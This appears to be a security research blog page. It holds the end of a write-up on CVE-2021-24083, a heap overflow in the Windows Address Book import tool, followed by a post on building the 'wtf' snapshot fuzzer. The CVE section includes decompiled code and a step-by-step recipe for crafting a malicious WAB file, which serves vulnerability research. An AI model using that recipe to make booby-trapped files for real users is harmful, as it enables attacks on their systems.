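    #include <cstdint>

    // Per-element size used by the check, reconstructed from the pseudocode above.
    static uint32_t ElementSizeForTag(uint16_t Tag) {
      switch (Tag) {
      case 0x1002:                           return 2;   // PtypMultipleInteger16
      case 0x1003: case 0x1004:              return 4;
      case 0x1005: case 0x1006: case 0x1007:
      case 0x1014: case 0x1040:              return 8;
      case 0x1048:                           return 16;  // PtypMultipleGuid
      default:                               return 0;   // Unknown / non-processable
      }
    }

    // The pseudocode rejects the property when Size / NestedPropCount != res.
    bool PassesFixedLengthCheck(uint16_t Tag, uint32_t Size, uint32_t NestedPropCount) {
      return NestedPropCount != 0 &&
             (Size / NestedPropCount) == ElementSizeForTag(Tag);
    }

    // Benign:    Tag 0x1003, Size 16, NestedPropCount 4 -> 16 / 4 == 4, check passes.
    // Malformed: Tag 0x1058, Size 2,  NestedPropCount 8 -> 2 / 8 == 0 == res, check
    //            also passes, although the 2 bytes of Value are never inspected.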

After the checks have concluded, the function returns zero for a failed check and one for a passed check.

Subsequently, the function HrGetPropArrayFromFileRecord() calls HrGetPropArrayFromBuffer(), which aims to collect the properties into an array of _SPropValue structs and return it to the caller. The _SPropValue array has a length equal to the number of properties (as given by the contact header) and is allocated on the heap through a call to LocalAlloc(). The number of properties is multiplied by sizeof(_SPropValue) to yield the total buffer size. The following fragment shows the allocation taking place:

    if ( !property_array_r )
    {
        ret = -2147024809;
        goto LABEL_71;
    }
    *property_array_r = 0i64;
    header_dword_3_1 = set_to_zero + header_dword_3;

[9]

    if ( (unsigned int)header_dword_3_1 < header_dword_3       
      || (unsigned int)header_dword_3_1 > 0xAAAAAAA            
      || (v10 = (unsigned int)header_dword_3_1,                               
          property_array = (struct _SPropValue *)LocalAlloc(
                                                   0x40u,
                                                   0x18 * header_dword_3_1),
                                                   // sizeof(_SPropValue) * n_properties_in_binary
        (*property_array_r = property_array) == 0i64) )
    {
        ERROR_INSUFICIENT_MEMORY:
        ret = 0x8007000E;
        goto LABEL_71;
    }

An allocation of sizeof(_SPropValue) * n_properties_in_binary can be observed at [9]. Immediately after, each of the property structures is initialized and its property tag member is set to 1. After initialization, the buffer, on which security checks have already been performed, is processed property by property, with a pointer being advanced to the next property using the header and value sizes provided by the property in question.

If the property processed by the specific loop iteration is a simple property, the following code is executed:

    if ( !_bittest((const signed int *)&current_property_tag, 0xCu) )
    {
      if ( v16 < 4 )
        break;
      dword_1 = wab_ulong_buffer_full[1];
      ptr_to_dword_2 = (char *)(wab_ulong_buffer_full + 2);
      v38 = v16 - 4;
      if ( (unsigned int)dword_1 > v38 )
        break;
      current_property_tag = (unsigned __int16)current_property_tag;
      if ( (unsigned __int16)current_property_tag > 0xBu )
      {

[10]

        v39 = current_property_tag - 0x1E;
        if ( !v39 )
          goto LABEL_79;
        v40 = v39 - 1;
        if ( !v40 )
          goto LABEL_79;
        v41 = v40 - 0x21;
        if ( !v41 )
          goto LABEL_56;
        v42 = v41 - 8;
        if ( v42 )
        {
          if ( v42 != 0xBA )
            goto LABEL_56;
          v43 = dword_1;
          (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_1);
          if ( !(*property_array_r)[p_idx].Value.bin.lpb )
            goto ERROR_INSUFICIENT_MEMORY;
          (*property_array_r)[p_idx].Value.l = dword_1;
          v44 = *(&(*property_array_r)[p_idx].Value.at + 1);
        }
        else
        {
    LABEL_79:

[11]
                                           
          v43 = dword_1;
          (*property_array_r)[p_idx].Value.cur.int64 = (LONGLONG)LocalAlloc(0x40u, dword_1);
          v44 = (*property_array_r)[p_idx].Value.dbl;
          if ( v44 == 0.0 )
            goto ERROR_INSUFICIENT_MEMORY;
        }
        memcpy_0(*(void **)&v44, ptr_to_dword_2, v43);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[v43];
      }
      else
      {
    LABEL_56:               

[12]
           
        memcpy_0(&(*property_array_r)[v15].Value, ptr_to_dword_2, dword_1);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[dword_1];
      }
      remaining_bytes_to_process = v38 - dword_1;
      goto NEXT_PROPERTY;
    }

[Truncated]

    NEXT_PROPERTY:
        ++p_idx;
        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
          return 0;
      }

At [10] the property tag is extracted and compared with several constants. If the property tag is 0x1e (PtypString8), 0x1f (PtypString), or 0x48 (PtypGuid), then execution continues at [11]. If the property tag is 0x40 (PtypTime) or is not recognized, execution continues at [12]. The memcpy call at [12] is prone to a heap overflow.

Conversely, if the property being processed in the current loop iteration is not a simple property, the following code is executed. Notably, at this point the pointer DWORD *wab_ulong_buffer_full points to the property tag of the property being processed. Regardless of which composite property is being processed, before the property tag is identified the buffer is advanced to the beginning of the property value, i.e., to the fourth 32-bit integer of the property.

[13]

    if ( v16 < 4 )
    break;
    c_dword_1 = wab_ulong_buffer_full[1];
    v19 = v16 - 4;
    if ( v19 < 4 )
    break;
    dword_2 = wab_ulong_buffer_full[2];
    wab_ulong_buffer_full += 3;                     

    remaining_bytes_to_process = v19 - 4;

[14]

    if ( (unsigned __int16)current_property_tag >= 0x1002u )
    {
    if ( (unsigned __int16)current_property_tag <= 0x1007u || (unsigned __int16)current_property_tag == 0x1014 )
        goto LABEL_80;
    if ( (unsigned __int16)current_property_tag == 0x101E )
    {
        [Truncated]
        
    }
    if ( (unsigned __int16)current_property_tag == 0x101F )
    {
        [Truncated]        
    }
    if ( ((unsigned __int16)current_property_tag - 0x1040) & 0xFFFFFFF7 )
    {
        if ( (unsigned __int16)current_property_tag == 0x1102 )
        {
        [Truncated]
        }
    }
    else
    {
    LABEL_80:

[15]

        (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_2);
        if ( !(*property_array_r)[p_idx].Value.bin.lpb )
        goto ERROR_INSUFICIENT_MEMORY;
        (*property_array_r)[p_idx].Value.l = c_dword_1;
        if ( (unsigned int)dword_2 > remaining_bytes_to_process )
        break;
        memcpy_0((*property_array_r)[p_idx].Value.bin.lpb, wab_ulong_buffer_full, dword_2);
        wab_ulong_buffer_full = (ULONG *)((char *)wab_ulong_buffer_full + dword_2);
        remaining_bytes_to_process -= dword_2;
    }
    }

    NEXT_PROPERTY:
        ++p_idx;
        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
        return 0;
    }

After the buffer has been advanced at [13], the property tag is compared with several constants starting at [14]. Finally, the code fragment at [15] attempts to process a composite property (i.e., tag >= 0x1000) whose tag was not matched by the previous comparisons.

Although the processing logic of each property type is not relevant here, it is interesting to note that if the property tag is not recognized, the buffer pointer has still been advanced to the end of the property header, and it is never retracted. This happens if all of the following conditions are met:

  • The property tag is larger than or equal to 0x1002.
  • The property tag is larger than 0x1007.
  • The property tag is different from 0x1014.
  • The property tag is different from 0x101e.
  • The property tag is different from 0x101f.
  • The property tag is different from 0x1102.
  • The result of subtracting 0x1040 from the property tag, and performing a bitwise AND of the result with 0xFFFFFFF7 is nonzero.

Interestingly, if all of the above conditions are met, the property header of the composite property is skipped, and the next loop iteration will interpret its property body as a different property.
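
The comparison chain above can be condensed into a small predicate (a sketch based solely on the conditions just listed): it returns true exactly for the tags whose 12-byte composite header is consumed while the Value bytes are left in place for the next iteration.

    #include <cstdint>

    // Illustrative predicate for the comparison chain at [14].
    bool IsSkippedCompositeTag(uint16_t Tag) {
      const uint32_t T = Tag;
      if (T < 0x1002)                        return false;  // condition from the list above
      if (T <= 0x1007 || T == 0x1014)        return false;  // handled at [15]
      if (T == 0x101E || T == 0x101F)        return false;  // multiple-string handling
      if (((T - 0x1040) & 0xFFFFFFF7) == 0)  return false;  // 0x1040 / 0x1048, handled at [15]
      if (T == 0x1102)                       return false;  // PtypMultipleBinary handling
      return true;  // e.g. 0x1058: header consumed, Value re-parsed as the next property
    }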

Therefore, it is possible to overflow the _SPropValue array allocated in the heap by HrGetPropArrayFromBuffer() by using the following observations:

  • A specially crafted composite unknown or non-processable property can be made to bypass security checks if NestedPropCount is larger than Size.
  • HrGetPropArrayFromBuffer() can be made to interpret the Value of a specially crafted property as a separate property.

Proof-of-Concept

In order to create a malicious WAB file from a benign WAB file, export a valid WAB file from an instance of the Windows Address Book. It is noted that Outlook Express on Windows XP includes the ability to export contacts as a WAB file.

The benign WAB file can be modified to make it malicious by altering a contact inside it to have the following characteristics:

  • A composite property containing the following:
    • A tag of an unknown or unprocessable type, for example the tag 0x1058, which must satisfy the following conditions:
      • It is larger than or equal to 0x1002.
      • It is larger than 0x1007.
      • It is different from 0x1014, 0x101e, 0x101f, and 0x1102.
      • The result of subtracting 0x1040 from the property tag and performing a bitwise AND of the result with 0xFFFFFFF7 is non-zero.
      • It is different from 0x1002, 0x1003, 0x1004, 0x1005, 0x1006, 0x1007, 0x1014, 0x1040, and 0x1048.
    • A NestedPropCount that is larger than Size.
    • An empty Value.
  • A malicious simple property containing the following:
    • A property tag different from 0x1e, 0x1f, 0x40, and 0x48, for example the tag 0x0.
    • A Size value larger than 0x18 x NestedPropCount, in order to overflow the _SPropValue array buffer.
    • An unspecified number of trailing bytes that will overflow the _SPropValue array buffer.

Finally, when an attacker tricks an unsuspecting user into importing the specially crafted WAB file, the vulnerability is triggered and code execution could be achieved. Failed exploitation attempts will most likely result in a crash of the Windows Address Book Import Tool.

Due to the presence of ASLR and a lack of a scripting engine, we were unable to obtain arbitrary code execution in Windows 10 from this vulnerability.

Conclusion

Hopefully you enjoyed this dive into CVE-2021-24083, and if you did, go ahead and check out our other blog post on a use-after-free vulnerability in Adobe Acrobat Reader DC. If you haven’t already, make sure to follow us on Twitter to keep up to date with our work. Happy hacking!


Building a new snapshot fuzzer & fuzzing IDA

Introduction

It is January 2020 and it is that time of the year when I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows, maybe it'll be the year where I get good at computers, I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like the Windows Hypervisor Platform APIs and the KVM APIs, but also to try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows target, whether user or kernel mode, an application, a service, or a driver. He had done some work in this area so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop a Windows snapshot-based fuzzer that runs the target code in some kind of environment like a VM or an emulator. It would allow the user to instrument the target the way they want via breakpoints and would provide the basic features you expect from a modern fuzzer: code coverage, crash detection, generic mutators, cross-platform support, fast restore, etc.

Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

  1. It is a complex Windows user-mode application,
  2. It parses a bunch of binary files,
  3. The application is heavy and slow to start; the snapshot approach could help fuzz it faster than a traditional setup would,
  4. It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz (wtf), its history, and my overall journey from zero to accomplishing my initial goals. For those who want the results before reading, you can find my findings in this Github repository: fuzzing-ida75.

There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

  1. The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state.
  2. The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading and writing physical and virtual memory ranges, reading and writing registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
  3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
  4. wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel crash dumps, which is essential for wtf. So I wrote kdmp-parser, a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available off the shelf. Getting physical memory is not enough because I also needed to dump the CPU state as well as MSRs, etc. Thankfully, yrp604 had already hacked up a WinDbg JavaScript extension to do the work, so I reused it: bdump.js.

Once I was able to extract the physical memory & the CPU state, I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time, so I started there. bochscpu is basically bochs's CPU exposed as a Rust library with C bindings (yes, he kindly made bindings because I didn't want to touch any Rust). It is essentially a software CPU that knows how to run Intel 64-bit code and knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs' devices, so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboard, etc.

Bochscpu 101

The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

  1. No need to load an entire dump of memory inside the emulator when it starts,
  2. Only used memory gets mapped, making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

  1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
  2. GVA: Guest virtual address. This is guest virtual memory.
  3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {

    //
    // Copy the dump page into the new page.
    //

    memcpy(Page, DmpPage, Page::Size);

  } else {

    //
    // Fake it 'till you make it.
    //

    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //

  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}

It is simple:

  1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
  2. we populate its content using the crash dump.
  3. we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState:

void BochscpuBackend_t::LoadState(const CpuState_t &State) {
  bochscpu_cpu_state_t Bochs;
  memset(&Bochs, 0, sizeof(Bochs));

  Seed_ = State.Seed;
  Bochs.bochscpu_seed = State.Seed;
  Bochs.rax = State.Rax;
  Bochs.rbx = State.Rbx;
//...
  Bochs.rflags = State.Rflags;
  Bochs.tsc = State.Tsc;
  Bochs.apic_base = State.ApicBase;
  Bochs.sysenter_cs = State.SysenterCs;
  Bochs.sysenter_esp = State.SysenterEsp;
  Bochs.sysenter_eip = State.SysenterEip;
  Bochs.pat = State.Pat;
  Bochs.efer = uint32_t(State.Efer.Flags);
  Bochs.star = State.Star;
  Bochs.lstar = State.Lstar;
  Bochs.cstar = State.Cstar;
  Bochs.sfmask = State.Sfmask;
  Bochs.kernel_gs_base = State.KernelGsBase;
  Bochs.tsc_aux = State.TscAux;
  Bochs.fpcw = State.Fpcw;
  Bochs.fpsw = State.Fpsw;
  Bochs.fptw = State.Fptw;
  Bochs.cr0 = uint32_t(State.Cr0.Flags);
  Bochs.cr2 = State.Cr2;
  Bochs.cr3 = State.Cr3;
  Bochs.cr4 = uint32_t(State.Cr4.Flags);
  Bochs.cr8 = State.Cr8;
  Bochs.xcr0 = State.Xcr0;
  Bochs.dr0 = State.Dr0;
  Bochs.dr1 = State.Dr1;
  Bochs.dr2 = State.Dr2;
  Bochs.dr3 = State.Dr3;
  Bochs.dr6 = State.Dr6;
  Bochs.dr7 = State.Dr7;
  Bochs.mxcsr = State.Mxcsr;
  Bochs.mxcsr_mask = State.MxcsrMask;
  Bochs.fpop = State.Fpop;

#define SEG(_Bochs_, _Whv_)                                                    \
  {                                                                            \
    Bochs._Bochs_.attr = State._Whv_.Attr;                                     \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
    Bochs._Bochs_.present = State._Whv_.Present;                               \
    Bochs._Bochs_.selector = State._Whv_.Selector;                             \
  }

  SEG(es, Es);
  SEG(cs, Cs);
  SEG(ss, Ss);
  SEG(ds, Ds);
  SEG(fs, Fs);
  SEG(gs, Gs);
  SEG(tr, Tr);
  SEG(ldtr, Ldtr);

#undef SEG

#define GLOBALSEG(_Bochs_, _Whv_)                                              \
  {                                                                            \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
  }

  GLOBALSEG(gdtr, Gdtr);
  GLOBALSEG(idtr, Idtr);

  // ...
  bochscpu_cpu_set_state(Cpu_, &Bochs);
}

In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this:

//
// Prepare the hooks.
//

Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;

I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

//
// Lift off.
//

bochscpu_cpu_run(Cpu_, HookChain_);

Great, we're now pros and we can run some code!

Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory.

Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, that is why writing across two pages needs extra care.

Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care.
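
Here is a minimal sketch of what such a physical-memory write can look like (not wtf's actual implementation): it assumes bochscpu_mem_phy_translate() returns the backing HVA of a GPA page (or a null pointer if the page isn't mapped) and that pages are 0x1000 bytes, and it splits the copy at page boundaries since adjacent GPA pages are generally not adjacent in host memory. A virtual write would first walk the guest page tables to turn each GVA page into a GPA and then reuse the same routine.

#include <algorithm>
#include <cstdint>
#include <cstring>

// Sketch of a guest physical memory write on top of bochscpu (assumes the
// bochscpu C header is included for bochscpu_mem_phy_translate).
constexpr uint64_t PageSize = 0x1000;

bool PhyWrite(uint64_t Gpa, const uint8_t *Buffer, uint64_t BufferSize) {
  while (BufferSize > 0) {
    const uint64_t AlignedGpa = Gpa & ~(PageSize - 1);
    const uint64_t Offset = Gpa - AlignedGpa;

    // Find the HVA backing the current GPA page.
    uint8_t *Hva = (uint8_t *)bochscpu_mem_phy_translate(AlignedGpa);
    if (Hva == nullptr) {
      return false;
    }

    // Never copy past the end of the current page; the next GPA page may be
    // backed by a completely different HVA.
    const uint64_t Chunk = std::min(BufferSize, PageSize - Offset);
    memcpy(Hva + Offset, Buffer, Chunk);

    Gpa += Chunk;
    Buffer += Chunk;
    BufferSize -= Chunk;
  }
  return true;
}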

Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. As another example, the user might need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy, as we receive a notification every time an instruction is executed. This is the perfect spot to check if a breakpoint is registered at the current address and, if so, invoke its callback:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //

  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}

Handling infinite loop

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t,
                                           void *) {

  //
  // Keep track of the instructions executed.
  //

  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //

  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {

    //
    // If we're over the limit, we stop the cpu.
    //

    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}

Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

Tracking dirty memory

wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to.

void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t,
                                      uint64_t VirtualAddress,
                                      uint64_t PhysicalAddress, uintptr_t Len,
                                      uint32_t, uint32_t MemAccess) {

  // ...

  //
  // If this is not a write access, we don't care to go further.
  //

  if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE &&
      MemAccess != BOCHSCPU_HOOK_MEM_RW) {
    return;
  }

  //
  // Adding the physical address the set of dirty GPAs.
  // We don't use DirtyVirtualMemoryRange here as we need to
  // do a GVA->GPA translation which is a bit costly.
  //

  DirtyGpa(Gpa_t(PhysicalAddress));
}

Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy:

bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) {
  // ...
  //
  // Restore physical memory.
  //

  uint8_t ZeroPage[Page::Size];
  memset(ZeroPage, 0, sizeof(ZeroPage));
  for (const auto DirtyGpa : DirtyGpas_) {
    const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64());

    //
    // As we allocate physical memory pages full of zeros when
    // the guest tries to access a GPA that isn't present in the dump,
    // we need to be able to restore those. It's easy, if the Hva is nullptr,
    // we point it to a zero page.
    //

    if (Hva == nullptr) {
      Hva = ZeroPage;
    }

    bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size);
  }

  //
  // Empty the set.
  //

  DirtyGpas_.clear();

  // ...
  return true;
}

Generic mutators

I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's.

class LibfuzzerMutator_t {
  using CustomMutatorFunc_t =
      decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator);
  fuzzer::Random Rand_;
  fuzzer::MutationDispatcher Mut_;
  std::unique_ptr<fuzzer::Unit> CrossOverWith_;

public:
  explicit LibfuzzerMutator_t(std::mt19937_64 &Rng);

  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void RegisterCustomMutator(const CustomMutatorFunc_t F);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

class HonggfuzzMutator_t {
  honggfuzz::dynfile_t DynFile_;
  honggfuzz::honggfuzz_t Global_;
  std::mt19937_64 &Rng_;
  honggfuzz::run_t Run_;

public:
  explicit HonggfuzzMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

Corpus store

Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory.

The main loop asks the corpus for a test case, which gets mutated by one of the generic mutators and finally runs in one of the execution environments. If the test case generated new coverage, it gets added to the corpus store - nothing fancy.

    //
    // If the coverage size has changed, it means that this testcase
    // provided new coverage indeed.
    //

    const bool NewCoverage = Coverage_.size() > SizeBefore;
    if (NewCoverage) {

      //
      // Allocate a test that will get moved into the corpus and maybe
      // saved on disk.
      //

      Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(),
                          ReceivedTestcase.size());

      //
      // Before moving the buffer into the corpus, set up cross over with
      // it.
      //

      Mutator_->SetCrossOverWith(Testcase);

      //
      // Ready to move the buffer into the corpus now.
      //

      Corpus_.SaveTestcase(Result, std::move(Testcase));
    }
  }

  // [...]

  //
  // If we get here, it means that we are ready to mutate.
  // First thing we do is to grab a seed.
  //

  const Testcase_t *Testcase = Corpus_.PickTestcase();
  if (!Testcase) {
    fmt::print("The corpus is empty, exiting\n");
    std::abort();
  }

  //
  // If the testcase is too big, abort as this should not happen.
  //

  if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) {
    fmt::print(
        "The testcase buffer len is bigger than the testcase buffer max "
        "size.\n");
    std::abort();
  }

  //
  // Copy the input in a buffer we're going to mutate.
  //

  memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(),
          Testcase->BufferSize_);

  //
  // Mutate in the scratch buffer.
  //

  const size_t TestcaseBufferSize =
      Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_,
                        Opts_.TestcaseBufferMaxSize);

  //
  // Copy the testcase in its own buffer before sending it to the
  // consumer.
  //

  TestcaseContent.resize(TestcaseBufferSize);
  memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);

Detecting context switches

Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed:

void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t,
                                       uint32_t What, uint64_t NewCrValue) {

  //
  // We only care about CR3 changes.
  //

  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //

  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //

  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}

Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a test case to your target. To do that, you might need to read some global state to retrieve the offsets of some critical structures. We've built memory access facilities so you can definitely do that, but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc.

This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.
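
As a standalone sketch (this is not wtf's Debugger_t, just the underlying dbgeng calls), resolving a symbol out of a kernel crash dump can look roughly like this; error handling is mostly omitted for brevity:

#include <windows.h>
#include <dbgeng.h>
#include <cstdint>
#pragma comment(lib, "dbgeng.lib")

// Open a crash dump with dbgeng and resolve a symbol such as
// "ntdll!RtlDispatchException" to an address.
uint64_t ResolveSymbol(const char *DumpPath, const char *Symbol) {
  IDebugClient *Client = nullptr;
  IDebugControl *Control = nullptr;
  IDebugSymbols *Symbols = nullptr;

  if (FAILED(DebugCreate(__uuidof(IDebugClient), (void **)&Client))) {
    return 0;
  }

  Client->QueryInterface(__uuidof(IDebugControl), (void **)&Control);
  Client->QueryInterface(__uuidof(IDebugSymbols), (void **)&Symbols);

  // Load the dump and wait until dbgeng is done processing it.
  Client->OpenDumpFile(DumpPath);
  Control->WaitForEvent(DEBUG_WAIT_DEFAULT, INFINITE);

  ULONG64 Offset = 0;
  Symbols->GetOffsetByName(Symbol, &Offset);

  Symbols->Release();
  Control->Release();
  Client->Release();
  return Offset;
}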

Trace generation

